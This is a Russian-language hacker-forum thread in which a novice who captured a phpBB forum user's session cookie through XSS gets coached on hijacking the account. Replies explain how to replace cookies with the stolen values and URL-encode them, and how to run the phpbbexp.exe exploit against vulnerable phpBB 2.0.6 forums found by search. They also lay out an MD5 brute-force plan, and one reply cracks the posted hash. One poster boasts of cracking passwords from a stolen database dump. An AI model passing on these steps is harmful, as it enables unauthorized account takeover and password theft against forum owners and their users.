|
phpbb2.0.17
Удалось вот эту инфу украсть
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0 :"";s:6:"userid";s:2:"17";}; phpbb2mysql_sid=9e4372133ffcbf434cd7af86903b2921; phpbb2mysql_t=a:1:{i:47;i:1131132144;} AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Что дальше надо делать? |
Заменить свое этим...
|
Можно по-подробней, что надо делать...
Это мой первый взлом форума. |
Если 1й то попробый найти phpbbexp.exe и форум в яндексе или google.ru Powered by phpbb 2.0.6
потом Пуск>Выполнить там введи cmd и в командной строке выполни phpbbexp.exe http://***.ru*/forum/ 1 1 и у тя будет полный доступ в админ панель :) |
Shapka
Это не куки админа, это куки пользователя, который имеет доступ в закрытые разделы. Значит, мне надо 1)скачать прогу phpbbexp.exe 2) что надо искать в yandex.ru ? зачем мне Powered by phpbb 2.0.6 , у меня же движок 2,0,17 |
смени свои куки(как чиатй на сайте на форуме )
|
africanec
дело в том, что когда программой cookie editor я ещу куки этого форума, то у меня выходит только кукие с именем phpbb2mysql_data , а вот phpbb2mysql_sid отсутствует... мне надо самому его создать? |
Shapka
эта прога дала результат _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperщ ... c29c339ae827878a16fc19498440ef14 http://*****/forum/?sid=c29c339ae827878a16fc19498440ef1 _ recuperation du nom de la table sql ... can't find |
поставь себе оперу и меняй все там просто и удобно
|
Цитата:
Э тебя ничего не выйдет-у чувака не был проставлен автологин, видишь в куках хэша нет... |
А так...если ты украл нормальные куки, то у тебя есть 2способа:
1)расшифровать хэш 2)как уже говорили, ставишь оперу, и меняешь в куках phpbb2mysql_data на украденный, phpbb2mysql_sid не нужно менять. Только не забудь перекодировать куки. |
Ван
А если чеё-нибудь хэш украду, то мне его подставлять в куки или расшифровывать надо? |
Можно и замутить куки, вставив в них хэш и id юзера, а можно и расшифровать и получить пароль в чистом виде.
|
->перекодировать куки - это как?
|
такс... вот что получил нового
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:3 2:"25d55ad283aa400af464c76d713c07ad";s:6:"userid"; s:2:"17";}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"25d 55ad283aa400af464c76d713c07ad";s:6:"userid";i:17;} AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) |
короче, http://*****/forum/?sid=c29c339ae827878a16fc19498440ef1 это есть sid адресс сессии, чисти кукиес у своей Мозилки и вводи это адресной строке, и если форум дырявый то ты залогинишься автоматом под админом...
Вообще я рекомендую начать с форума 2.0.6 они дырявые насквозь есть и ты на них научишься некоторым азам... а потом переходить на более новые версии |
http://webmastertools.narod.ru/Onlin...rl_decode.html - десь перекодировать куки. Например, у тебя было:
Код:
a:2:{s:11:"autologinid";s:32:"25d55ad283aa400af464c76d713c07ad";s:6:"userid";i:17;}Код:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2225d55ad283aa400af464c76d713c07ad%22%3Bs%3A6%3A%22userid%22%3Bi%3A17%3B%7DВ куках хранится хэш пароля. В твоих куках хэш:25d55ad283aa400af464c76d713c07ad Берём прогу PasswordsPro, и брутим или перебираем по словарику. В твоём случае пароль лёгкий: 12345678 Удачи. З.Ы.Можно мне репутацию поднять... |
Shapka
Да я не собираюсь хакером быть, мне просто надо получить информацию с того форума. С сессиями ничего не вышло. |
Цитата:
|
Ван
спасибо за помощь. |
опера сама декодирует вроде сроду некодировал куки
|
короче смотри украасть хэш это урасть пароль закодированный в MD5 его потом расшифравать надо... используй для этого propass скачать можно на www.web-hack.ru скорость перебора у нее 4,500,000 комбинаций в секунду....
1. Мои рекомендации, вначале атакуй брутфорсом длинна пароля от1 до 9 символов, вначале перебери все цифры(0123456789)... 2. потом делай атаку брутфорсом но по буквам(qwertyuuioplkjhgfdsazxcvbnm) я их не по порядку указал... вот перебирай примерно 5-8мин, если пароль все еще не надешь 3. делай вот что делай снова атаку брутфорсом по буквам и цифрам(0123456789qwertyuioplkjhgfdsazxcvbnm) перебирай примерно 5-8мин Таким способом я расшифровал 98 паролей и 121(из ворованого дампа Мускульной базы одного сайта) |
Shapka
С моим GPRS брутсофт бесполезен. Я просто XSS через картинку сделал, а вот дальше что делать не знал. Всем спасибо за помощь, по респекту. |
Видео с сайта качай там все показано
|
Я иммею ввиду не брутфорс в инете, а когда ты урадешь хэш то его надо расшифровать... это делается не в инете а локальная машина
|
Подскажите что за бойда почемуто ни че не получается!
D:\Documents and Settings\1>c:\phpbbexp.exe http://talk.sapience.ru/ 1 1 _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperщ ... 62420f6ee65081679c1ad6bced950ee4 http://talk.sapience.ru/?sid=62420f6...1ad6bced950ee4 _ recuperation du nom de la table sql ... can't find |
Цитата:
|
| Время: 03:19 |